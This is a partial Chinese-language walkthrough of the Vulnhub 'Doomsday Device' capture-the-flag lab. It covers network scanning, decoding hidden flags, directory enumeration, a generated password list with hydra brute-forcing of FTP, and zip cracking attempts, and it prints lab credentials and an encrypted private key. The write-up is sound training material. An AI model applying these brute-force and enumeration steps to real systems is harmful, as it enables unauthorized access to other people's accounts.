Vulnhub之Doomsday Device靶机解题过程(部分)
Doomsday Device
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.177.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:2b:cc:72 1 60 PCS Systemtechnik GmbH
192.168.56.187 08:00:27:ce:3c:0e 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.187
NMAP扫描
──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.187 -oN nmap_full_scan
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-18 02:23 EST
Nmap scan report for bogon (192.168.56.187)
Host is up (0.00020s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/nothingtoseehere
|_http-server-header: Apache/2.4.29 (Ubuntu)
18888/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Koken API error
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: Apache/2.4.29 (Ubuntu)
65533/tcp open http Apache httpd 2.4.29
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:CE:3C:0E (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.1.1; OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.79 seconds
NMAP扫描结果表明目标主机有4个开放端口。
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ ftp 192.168.56.187
Connected to 192.168.56.187.
220 (vsFTPd 3.0.3)
Name (192.168.56.187:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp>
ftp> quit
221 Goodbye.
FTP不支持匿名访问,FTP服务: vsftpd3.0.3, 没有可利用的漏洞。
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ curl http://192.168.56.187/
<!DOCTYPE html>
<html>
<head>
<style>
body {
background-image: url('background.png');
background-repeat: no-repeat;
background-attachment: fixed;
background-size: cover;
}
</style>
</head>
<body>
</body>
</html>
<!-- Li0tLSAuLiAtLSAvIC4tIC0uIC0uLiAvIC4tLS4gLi0gLS0gLyAuLi4uIC4tIC4uLi0gLiAvIC0gLi0gLi0uLiAtLi0gLiAtLi4gLyAuLSAtLi4uIC0tLSAuLi0gLSAvIC0tIC4gLyAuLiAtLiAvIC0tIC0tLSAuLS4gLi4uIC4gLyAtLi0uIC0tLSAtLi4gLiAvIC4uLiAuIC4uLi0gLiAuLS4gLi0gLi0uLiAvIC0gLi4gLS0gLiAuLi4gLi0uLS4tIC8gLS4uLiAuLi0gLSAvIC4tLS0gLS0tIC0uLSAuIC4tLS0tLiAuLi4gLyAtLS0gLS4gLyAtIC4uLi4gLiAtLSAvIC0uLi4gLiAtLi0uIC4tIC4uLSAuLi4gLiAvIC4uIC8gLS4tIC0uIC0tLSAuLS0gLyAtLSAtLS0gLi0uIC4uLiAuIC8gLS4tLiAtLS0gLS4uIC4gLi0uLS4tIC8gLi4uIC4uIC0uIC0uLS4gLiAvIC0uLS0gLS0tIC4uLSAvIC0uLS4gLS0tIC4uLSAuLS4uIC0uLiAvIC4tLiAuIC4tIC0uLiAvIC0gLi4uLiAuLiAuLi4gLyAuLiAvIC4tIC4uLiAuLi4gLi4tIC0tIC4gLyAtLi0tIC0tLSAuLi0gLyAtLi0gLS4gLS0tIC4tLSAvIC4uIC0gLyAtIC0tLSAtLS0gLi0uLS4tIC8gLi0gLS4gLS4tLSAuLS0gLi0gLS4tLSAuLi4gLyAtIC4uLi4gLi4gLi4uIC8gLi4gLi4uIC8gLi0tLSAuLi0gLi4uIC0gLyAtIC4uLi4gLiAvIC4uLS4gLi4gLi0uIC4uLiAtIC8gLi4tLiAuLS4uIC4tIC0tLiAtLS4uLS0gLyAtLi0tIC0tLSAuLi0gLyAuLS0gLi4gLi0uLiAuLS4uIC8gLS4gLiAuLi4tIC4gLi0uIC8gLS4tLiAuLS4gLi0gLS4tLiAtLi0gLyAtLSAtLi0tIC8gLi4gLS4gLS0uIC4gLS4gLi4gLS0tIC4uLSAuLi4gLyAtLSAuLSAtLi0uIC4uLi4gLi4gLS4gLiAtLS4uLS0gLyAtLi4gLS0tIC0uIC4tLS0tLiAtIC8gLi4tLiAtLS0gLi0uIC0tLiAuIC0gLyAuLiAvIC4tIC0tIC8gLS4uLiAuIC0gLSAuIC4tLiAvIC0gLi4uLiAuLSAtLiAvIC0uLS0gLS0tIC4uLSAvIC4uLi4gLi0gLi4uLSAuIC8gLiAuLi4tIC4gLi0uIC8gLS4uLiAuIC4gLS4gLyAtLS0gLi0uIC8gLiAuLi4tIC4gLi0uIC8gLi0tIC4uIC4tLi4gLi0uLiAvIC0uLi4gLiAtLi0uLS0gLyAtLi4gLi0tIC4uIC0tLiAuLi4uIC0gLyAuLi0uIC4tLi4gLi0gLS0uIC4tLS0tIC0tLS4uLiAvIC0tLS4uIC0uLS4gLi0gLi4tLiAtLS0tLiAtLi0uIC0uLi4uIC4uLi4tIC4uLS4gLS0tLS4gLS4uIC4tLS0tIC4tLS0tIC0tLS4uIC4tLS0tIC4uLS0tIC0tLS0tIC0uLi4uIC4uLS4gLiAtLi0uIC0tLi4uIC4uLS4gLi4uLi0gLS0tLS0gLi0gLS0uLi4gLi4uLi4gLi4tLS0gLi4uLi0gLS4uLiAuLi4tLQ== -->
访问80端口,返回页面源代码中有注释,经base64解码后为:
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ echo "Li0tLSAuLiAtLSAvIC4tIC0uIC0uLiAvIC4tLS4gLi0gLS0gLyAuLi4uIC4tIC4uLi0gLiAvIC0gLi0gLi0uLiAtLi0gLiAtLi4gLyAuLSAtLi4uIC0tLSAuLi0gLSAvIC0tIC4gLyAuLiAtLiAvIC0tIC0tLSAuLS4gLi4uIC4gLyAtLi0uIC0tLSAtLi4gLiAvIC4uLiAuIC4uLi0gLiAuLS4gLi0gLi0uLiAvIC0gLi4gLS0gLiAuLi4gLi0uLS4tIC8gLS4uLiAuLi0gLSAvIC4tLS0gLS0tIC0uLSAuIC4tLS0tLiAuLi4gLyAtLS0gLS4gLyAtIC4uLi4gLiAtLSAvIC0uLi4gLiAtLi0uIC4tIC4uLSAuLi4gLiAvIC4uIC8gLS4tIC0uIC0tLSAuLS0gLyAtLSAtLS0gLi0uIC4uLiAuIC8gLS4tLiAtLS0gLS4uIC4gLi0uLS4tIC8gLi4uIC4uIC0uIC0uLS4gLiAvIC0uLS0gLS0tIC4uLSAvIC0uLS4gLS0tIC4uLSAuLS4uIC0uLiAvIC4tLiAuIC4tIC0uLiAvIC0gLi4uLiAuLiAuLi4gLyAuLiAvIC4tIC4uLiAuLi4gLi4tIC0tIC4gLyAtLi0tIC0tLSAuLi0gLyAtLi0gLS4gLS0tIC4tLSAvIC4uIC0gLyAtIC0tLSAtLS0gLi0uLS4tIC8gLi0gLS4gLS4tLSAuLS0gLi0gLS4tLSAuLi4gLyAtIC4uLi4gLi4gLi4uIC8gLi4gLi4uIC8gLi0tLSAuLi0gLi4uIC0gLyAtIC4uLi4gLiAvIC4uLS4gLi4gLi0uIC4uLiAtIC8gLi4tLiAuLS4uIC4tIC0tLiAtLS4uLS0gLyAtLi0tIC0tLSAuLi0gLyAuLS0gLi4gLi0uLiAuLS4uIC8gLS4gLiAuLi4tIC4gLi0uIC8gLS4tLiAuLS4gLi0gLS4tLiAtLi0gLyAtLSAtLi0tIC8gLi4gLS4gLS0uIC4gLS4gLi4gLS0tIC4uLSAuLi4gLyAtLSAuLSAtLi0uIC4uLi4gLi4gLS4gLiAtLS4uLS0gLyAtLi4gLS0tIC0uIC4tLS0tLiAtIC8gLi4tLiAtLS0gLi0uIC0tLiAuIC0gLyAuLiAvIC4tIC0tIC8gLS4uLiAuIC0gLSAuIC4tLiAvIC0gLi4uLiAuLSAtLiAvIC0uLS0gLS0tIC4uLSAvIC4uLi4gLi0gLi4uLSAuIC8gLiAuLi4tIC4gLi0uIC8gLS4uLiAuIC4gLS4gLyAtLS0gLi0uIC8gLiAuLi4tIC4gLi0uIC8gLi0tIC4uIC4tLi4gLi0uLiAvIC0uLi4gLiAtLi0uLS0gLyAtLi4gLi0tIC4uIC0tLiAuLi4uIC0gLyAuLi0uIC4tLi4gLi0gLS0uIC4tLS0tIC0tLS4uLiAvIC0tLS4uIC0uLS4gLi0gLi4tLiAtLS0tLiAtLi0uIC0uLi4uIC4uLi4tIC4uLS4gLS0tLS4gLS4uIC4tLS0tIC4tLS0tIC0tLS4uIC4tLS0tIC4uLS0tIC0tLS0tIC0uLi4uIC4uLS4gLiAtLi0uIC0tLi4uIC4uLS4gLi4uLi0gLS0tLS0gLi0gLS0uLi4gLi4uLi4gLi4tLS0gLi4uLi0gLS4uLiAuLi4tLQ==" | base64 -d
.--- .. -- / .- -. -.. / .--. .- -- / .... .- ...- . / - .- .-.. -.- . -.. / .- -... --- ..- - / -- . / .. -. / -- --- .-. ... . / -.-. --- -.. . / ... . ...- . .-. .- .-.. / - .. -- . ... .-.-.- / -... ..- - / .--- --- -.- . .----. ... / --- -. / - .... . -- / -... . -.-. .- ..- ... . / .. / -.- -. --- .-- / -- --- .-. ... . / -.-. --- -.. . .-.-.- / ... .. -. -.-. . / -.-- --- ..- / -.-. --- ..- .-.. -.. / .-. . .- -.. / - .... .. ... / .. / .- ... ... ..- -- . / -.-- --- ..- / -.- -. --- .-- / .. - / - --- --- .-.-.- / .- -. -.-- .-- .- -.-- ... / - .... .. ... / .. ... / .--- ..- ... - / - .... . / ..-. .. .-. ... - / ..-. .-.. .- --. --..-- / -.-- --- ..- / .-- .. .-.. .-.. / -. . ...- . .-. / -.-. .-. .- -.-. -.- / -- -.-- / .. -. --. . -. .. --- ..- ... / -- .- -.-. .... .. -. . --..-- / -.. --- -. .----. - / ..-. --- .-. --. . - / .. / .- -- / -... . - - . .-. / - .... .- -. / -.-- --- ..- / .... .- ...- . / . ...- . .-. / -... . . -. / --- .-. / . ...- . .-. / .-- .. .-.. .-.. / -... . -.-.-- / -.. .-- .. --. .... - / ..-. .-.. .- --. .---- ---... / ---.. -.-. .- ..-. ----. -.-. -.... ....- ..-. ----. -.. .---- .---- ---.. .---- ..--- ----- -.... ..-. . -.-. --... ..-. ....- ----- .- --... ..... ..--- ....- -... ...--
得到的数据可能是莫尔斯电码,进一步解码(用cyberchef网站):
JIMANDPAMHAVETALKEDABOUTMEINMORSECODESEVERALTIMES.BUTJOKE'SONTHEMBECAUSEIKNOWMORSECODE.SINCEYOUCOULDREADTHISIASSUMEYOUKNOWITTOO.ANYWAYSTHISISJUSTTHEFIRSTFLAG,YOUWILLNEVERCRACKMYINGENIOUSMACHINE,DON'TFORGETIAMBETTERTHANYOUHAVEEVERBEENOREVERWILLBE!DWIGHTFLAG1:8CAF9C64F9D1181206FEC7F40A7524B3
这里就得到第一个flag: FLAG1:8CAF9C64F9D1181206FEC7F40A7524B3
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ gobuster dir -u http://192.168.56.187 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.187
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/18 02:43:40 Starting gobuster in directory enumeration mode
===============================================================
/nick (Status: 301) [Size: 315] [--> http://192.168.56.187/nick/]
/staffblog (Status: 301) [Size: 320] [--> http://192.168.56.187/staffblog/]
/server-status (Status: 403) [Size: 279]
Progress: 218827 / 220561 (99.21%)===============================================================
2022/11/18 02:44:07 Finished
===============================================================
扫描出来两个目录/nick, /staffblog,分别用浏览器看一下是什么内容?
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ curl http://192.168.56.187/robots.txt
User-agent: *
Disallow: /nothingtoseehere
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ curl http://192.168.56.187/nick/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /nick</title>
</head>
<body>
<h1>Index of /nick</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="farewell.txt">farewell.txt</a></td><td align="right">2020-11-30 08:58 </td><td align="right">399 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="nick.pcap">nick.pcap</a></td><td align="right">2020-10-19 07:58 </td><td align="right">7.6K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.187 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ wget http://192.168.56.187/nick/farewell.txt
--2022-11-18 02:46:37-- http://192.168.56.187/nick/farewell.txt
Connecting to 192.168.56.187:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 399 [text/plain]
Saving to: ‘farewell.txt’
farewell.txt 100%[================================================================================================================================>] 399 --.-KB/s in 0s
2022-11-18 02:46:37 (94.4 MB/s) - ‘farewell.txt’ saved [399/399]
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ cat farewell.txt
Hey Michael!
I just wanted to say goodbye. Through Teach for America, I'm gonna go down to Detroit and teach inner-city kids about computers. You know, I'm the lame IT guy and probably you don't even know my name so, who cares. But I just wanted you to know that the old creepy guy uses a pretty weak password. You know, the one who smells like death. You should do something about it.
Nick
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ mv ~/Downloads/nick.pcap
mv: missing destination file operand after '/home/kali/Downloads/nick.pcap'
Try 'mv --help' for more information.
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ mv ~/Downloads/nick.pcap .
这里得到一个抓包文件,同时Farewell.txt告诉我们有个用户的密码很弱。
/staffblog目录下有个文档,将该文档下载到Kali Linux本地查看,得到了第3个flag:
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ ls
CreedThoughts.doc farewell.txt nick.pcap nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ cat CreedThoughts.doc
��ࡱ▒�;�� ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
▒����▒������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������Root Entry������������������������������������������������������������������������
▒▒����"#����%������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
���� �F▒Microsoft Word-Dokument
MSWordDocWord.Document.8�9�q
[^��^Normal
���x$▒OJQJCJPJ^JaJ8B8JQJCJ▒mHsHKHPJnt^JaJ▒_H9D�DC�msor
�x�x Sz�vegt�rzsd���"/"Lista^@""@Felirat
$CJ▒^aJ▒2�22
T�rgymutat�
$^>�B>
Listatartalom^�7]�`�6�R6 Id�zetblokk^�7]�7`����R:
\tP G�Times New Roman5�Symbol3&�Ariali��Liberation SerifTimes New Roman7��NSimSun3&��ArialS&��Liberation SansArialG��Microsoft YaHei3$�Arial�▒�hi��Ei��Ei��E����g 0 0��������Oh�+'��0|8 @
L
X
�����^^^r@v�#0��@��Iw��@@�p.�������՜.+,��D��՜.+,��\▒��▒����M ��tCaolan80 5 ��
~�\�b��
Creed Thoughts! �www.creedthoughts.gov.www/creedthoughts
Today in my office where I work as Director of Quality Assurance, we went to the beach for some reason that was never adequately explained. When we were there, our manager told us to eat hot coals. I thought that was a little bit untoward so I ate a fish. Then a woman I have literally never seen before in my entire life started talking very loudly about something involving Halpert. She was agitated, I,d say. From what I could guess, she was definitely on drugs of some kind, perhaps cocaine, or maybe ▒ drines. Also, she is a knock-out. She reminds me of a young Daphne Du Maurier. Also, I stupidly ate the fishbones. I told myself never again � after the last time, but th�FLAG3: �0f1ff7bt��>p24c0082be83a8b8c497rd is not safe enough. I wonder how he found out. Anyways, I added 3 digits to the end so it s supersafe now. Nobody's gonna crack that, baby!
�
4
▒FP��\����������{o
^�]�`���
�]�`���
�]�`���
�]�`���
�]�`���
�]�`���
�]�`���
�]�`���
�]�`����]�7`�^�]�7`�^�]�7`���DM�
��
\�"t���
^�]�`���
�]�`���
�]�`���<0��. ��A!�n"�i#�n$�n2P1�h0p3P(20Root Entry�������� �F� CompObj����jOle
��������1Table������������qSummaryInformation(����!�WordDocument▒�����������5 DocumentSummaryInformation8������������$t����������������
FLAG3: 0f1ff7btp24c0082be83a8b8c497rd
但是其实我们还没看到第2个flag
对了,还有个抓包文件没有查看:
这里看到了用户名和密码: creed creed
登录FTP,看一下有什么东东?但是很奇怪,并不能让我们登录。
前面的creedthoughts.doc文档中有句话: I wonder how he found out. Anyways, I added 3 digits to the end so it s supersafe now. Nobody's gonna crack that, baby
也就是说作者在creed后面加了3位数字形成新的密码,因此需要我们需要自己生成一个wordlist然后来破解
──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ cat wordlist_generator.py
f = open('password_list','w')
for i in range(1000):
password = 'creed'+str(i)
f.write(password+'\n')
f.close()
运行这个python脚本,生成密码字典,然后利用hydra工具进行破解:
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ hydra -l creed -P password_list ftp://192.168.56.187
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-18 03:02:36
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task
[DATA] attacking ftp://192.168.56.187:21/
[21][ftp] host: 192.168.56.187 login: creed password: creed223
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-18 03:03:26
此时得到FTP用户名creed 和密码: creed223, 登录目标主机的FTP服务:
──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ ftp 192.168.56.187
Connected to 192.168.56.187.
220 (vsFTPd 3.0.3)
Name (192.168.56.187:kali): creed
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||40081|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 2026 Nov 12 2020 archive.zip
-rw-r--r-- 1 0 0 176 Nov 30 2020 reminder.txt
226 Directory send OK.
ftp> get reminder.txt
local: reminder.txt remote: reminder.txt
229 Entering Extended Passive Mode (|||40004|)
150 Opening BINARY mode data connection for reminder.txt (176 bytes).
100% |*************************************************************************************************************************************************************************************| 176 126.19 KiB/s 00:00 ETA
226 Transfer complete.
176 bytes received in 00:00 (98.89 KiB/s)
ftp> get archive.zip
local: archive.zip remote: archive.zip
229 Entering Extended Passive Mode (|||40086|)
150 Opening BINARY mode data connection for archive.zip (2026 bytes).
100% |*************************************************************************************************************************************************************************************| 2026 3.84 MiB/s 00:00 ETA
226 Transfer complete.
2026 bytes received in 00:00 (1.97 MiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ ls
archive.zip CreedThoughts.doc farewell.txt nick.pcap nmap_full_scan password_list reminder.txt wordlist_generator.py
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ cat reminder.txt
Oh snap, I forgot the password for this zip file. I remember, it made Michael laugh when he heard it, but Pam got really offended.
#FLAG4: 4955cbee5a6a5a48ce79624932bd1374
此时得到了第4个flag,同时作者提示说要破解这个zip文件。
但是破解失败
──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ zip2john archive.zip > hashes
ver 2.0 efh 5455 efh 7875 archive.zip/email PKZIP Encr: TS_chk, cmplen=320, decmplen=460, crc=535FE2E6 ts=4A59 cs=4a59 type=8
ver 2.0 efh 5455 efh 7875 archive.zip/michael PKZIP Encr: TS_chk, cmplen=1372, decmplen=1766, crc=3B8FD23B ts=68CA cs=68ca type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ ls
archive.zip CreedThoughts.doc farewell.txt hashes nick.pcap nmap_full_scan password_list reminder.txt wordlist_generator.py
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2022-11-18 03:06) 0g/s 11033Kp/s 11033Kc/s 11033KC/s !LUVDKR!..*7¡Vamos!
Session completed.
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ unzip archive.zip
Archive: archive.zip
[archive.zip] email password:
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2022-11-18 03:07) 0g/s 13925Kp/s 13925Kc/s 13925KC/s !LUVDKR!..*7¡Vamos!
Session completed.
参考其他人的做法是说作者给的提示密码在season 7 episode 9.(真是完全不知道)
密码是: bigboobz
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ cat email
To: oscar@dundermifflin.com
Subject: Costume Party
From: michael@dundermifflin.com
Content-Type: text/html; charset="utf8"
Hey Oscar!
Angela is out sick so she couldn't manage the costume party gallery right now. Dwight showed up as a jamaican zombie woman AGAIN. It's gross. Please remove the picture from the gallery. Oh yeah, you don't have access to it, so just use Angela's profile. The password is most probably one of her cats name.
Michael
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ cat michael
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,CF1CA7F9558B5637B0C9F66B972B6AB6
GlAt2Uhi+zBOMhGrASR0ica1YTk7BTBNzKAkqLGzyTy1eplEKiTou7LdW5hV7Khf
ZU+9X9Cg5L9KHT+w0OFQeVghzYOwZ+aeyzoii1Wo/pFx460eUj5oFTJnsN/UvHfi
sjGX8bLp4RT+HjTZr7b2+XiDww33xdskdnXeHBc9CsDRA+59x8+bszto+X3zaIVF
LaJ4nIx2nTVtn9DKEItfmsL3iCn4BKKT1kQ94K8R3Cx11Hdb49buByRYcICJhoT6
j416LKNUnH9F53dLyHrY6VoxjrckZWQC05DhiNgva6TxBqoX8XMEVWNf9UBoqsbl
MYVY5p2nbvM6u6pyViX6hSqLLxMe9kcyvYeC51irASXIlGZW6fQEieGesRm4uKG4
HeFtT57TXh7XIjqscqsR/swFMF9FGRRro0fCDTza3q+lKrmGWSQT6zM4F4iH0oOu
6K8cpe2JBfBQTHIXG136Xu4IF/4FVzXFfP4B920ecwTjRdxpeCZIKcItqp6dQ50f
HomaBFr0Bka/UfyJADDaDJ1oC78Vgg31y6QQwQsfKpiL0GDYwmCYFEk2/WBF8uyf
ZwTh0CnyUcIyXxv996ZLfX9RSRcrKXhMjw2YLz43cP5bkwUrBZ1/OnnCsxzaZWBX
r+NZEWkFIfFGat6RWmregVwR58oQg4s07fIIN+VFWTdCl9HGFlMGBrpUrly5PIzF
5hEIxDiuL6LEcW5kMYwtrPCo4QK+++KikySBpNaVxuY0Fy1E07AKyFl+7DMu82eH
hI29O4ebO0J15jxIX8Ta9dXCspqKbYeL6RMB6/uZEd61cP2Mh0Kd8K7rUuCdyOIF
7RXF61whnhy4YB7Um+O3iTABQjsR2T0+IKxasYEriuQNMrqMwtQXPIfxJ/wAcViA
mLKh/HoCUCfoC8+ksWwycYuEde06OxRH9zn0HITt5pgs+gtkBgGG25xSUbE9rGMC
iQGd/wDIcad0tjT9WnxoSPvlYRHSWLy5KjyGGShWRcXbMM4lhZbvHHktr6pD35rn
XMWdsLTKn5xr0IDF+iBNpd/cUKGO1Wi4TjZkZf6aTZZCzumrf3/A1ZH6pf32vRdg
9fA4eEHgwwn/qLJRYo33mj96+gBdRleYBaIxUmxm4VbJ8qkD0kthPI32LzvVgKOM
8q2J1cC7pJN5BVM1nmMPxz29MUZXvf4RU75p9fE1lBaX/5aBp+J7HUHREBg0cod6
6NHJ+u/WgGhrUGITi2V+4SL7Xi5F1ig2goA8EL5MYlnv4tU39Bihw6AOfqmGza9H
cQr9vsF1ryFXqAD7IxwjjTYgcTWxEj2P/LBzeC6rfLzgPeulPkPHVBaiB2lzIGEB
uExO3CjF9cqZMRyRo8XhOmrZw5vE2eO43uqpWFIwb4PUoG3uVcKEVqpuZ6bSYPvI
L59nw0ONv+1G4t4BG/WSHGKBq1hcpOpNIFGASFR8eVVchpK9OtMTwGvSp/M7diRR
/EjSLFhcBhKgjInCHgyRnQa5X3B6z9/HIGkwdH381CuXl5MYxDAt3S3IvJ6prolz
0lpnN5PD4wHHDdvVSntdV5w4rdJSdWaVcHohLLj/elYvPkjor8MARqeLatyYUL2y
-----END RSA PRIVATE KEY-----
作者提示说这个密钥是angela, 而口令是她一个猫的名字,
再来看18888端口,值得注意的是gobuster和dirb失效,需要用ffuf工具或者wfuzz工具,可以扫描出目录:
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ wfuzz -c -u http://192.168.56.187:18888/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.187:18888/FUZZ
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 50 L 181 W 2991 Ch "# directory-list-2.3-medium.txt"
000000003: 200 50 L 181 W 2991 Ch "# Copyright 2007 James Fisher"
000000007: 200 50 L 181 W 2991 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000006: 200 50 L 181 W 2991 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000010: 200 50 L 181 W 2991 Ch "#"
000000014: 200 50 L 181 W 2991 Ch "http://192.168.56.187:18888/"
000000009: 200 50 L 181 W 2991 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000002: 200 50 L 181 W 2991 Ch "#"
000000013: 200 50 L 181 W 2991 Ch "#"
000000012: 200 50 L 181 W 2991 Ch "# on atleast 2 different hosts"
000000011: 200 50 L 181 W 2991 Ch "# Priority ordered case sensative list, where entries were found"
000000008: 200 50 L 181 W 2991 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000004: 200 50 L 181 W 2991 Ch "#"
000000005: 200 50 L 181 W 2991 Ch "# This work is licensed under the Creative Commons"
000000259: 301 9 L 28 W 325 Ch "admin"
000000482: 301 9 L 28 W 327 Ch "storage"
000000909: 301 9 L 28 W 323 Ch "app"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending
STRIVE FOR PROGRESS,NOT FOR PERFECTION
